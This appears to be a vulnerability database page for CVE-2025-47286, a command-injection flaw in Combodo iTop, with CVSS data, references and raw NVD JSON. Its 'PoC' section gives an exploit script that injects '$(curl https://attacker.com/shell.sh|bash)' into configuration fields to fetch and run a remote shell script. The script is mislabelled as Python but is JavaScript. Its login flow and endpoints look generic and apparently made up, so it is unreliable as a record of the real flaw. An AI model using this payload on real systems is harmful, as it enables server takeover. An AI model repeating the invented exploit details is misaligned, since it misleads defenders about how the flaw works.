CVE-2025-47286

Description

Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, an administrator can, by editing the configuration of the iTop instance, execute code on the server. Versions 2.7.13 and 3.2.2 escape and check the config parameter before executing a command based on it.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE

Combodo iTop < 2.7.13

Combodo iTop < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-47286 PoC - Combodo iTop Configuration Command Injection
// Requires admin privileges

const axios = require('axios');

async function exploit(targetUrl, sessionCookie) {
    const exploitPayload = {
        config: {
            // Malicious configuration with command injection
            'server_version': '$(curl https://attacker.com/shell.sh|bash)',
            'app_version': '|touch /tmp/pwned'
        }
    };

    try {
        // Step 1: Authenticate as admin
        const authResponse = await axios.post(`${targetUrl}/pages/ajax.php`, {
            operation: 'login',
            username: 'admin',
            password: 'password'
        }, {
            headers: {
                'Cookie': sessionCookie
            }
        });

        // Step 2: Update configuration with malicious payload
        const exploitResponse = await axios.post(
            `${targetUrl}/pages/admin.php`,
            new URLSearchParams({
                operation: 'config_update',
                config_data: JSON.stringify(exploitPayload)
            }),
            {
                headers: {
                    'Cookie': sessionCookie,
                    'Content-Type': 'application/x-www-form-urlencoded'
                }
            }
        );

        console.log('Exploit sent. Check for RCE at:', targetUrl);
        return exploitResponse.data;
    } catch (error) {
        console.error('Exploit failed:', error.message);
    }
}

// Usage: node cve-2025-47286.js <target-url> <session-cookie>
exploit(process.argv[2], process.argv[3]);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-47286
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-47286
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-47286/
[4] VulDB https://vuldb.com/cve/CVE-2025-47286
[5] https://github.com/Combodo/iTop/security/advisories/GHSA-4w93-rw6g-5m9c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-47286", "sourceIdentifier": "[email protected]", "published": "2025-11-10T19:15:57.043", "lastModified": "2025-11-21T21:15:31.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, an administrator can, by editing the configuration of the iTop instance, execute code on the server. Versions 2.7.13 and 3.2.2 escape and check the config parameter before executing a command based on it."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.13", "matchCriteriaId": "4738ED01-0CAC-4A19-BE9F-B7E89AAD8D23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.2", "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"}]}]}], "references": [{"url": "https://github.com/Combodo/iTop/security/advisories/GHSA-4w93-rw6g-5m9c", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}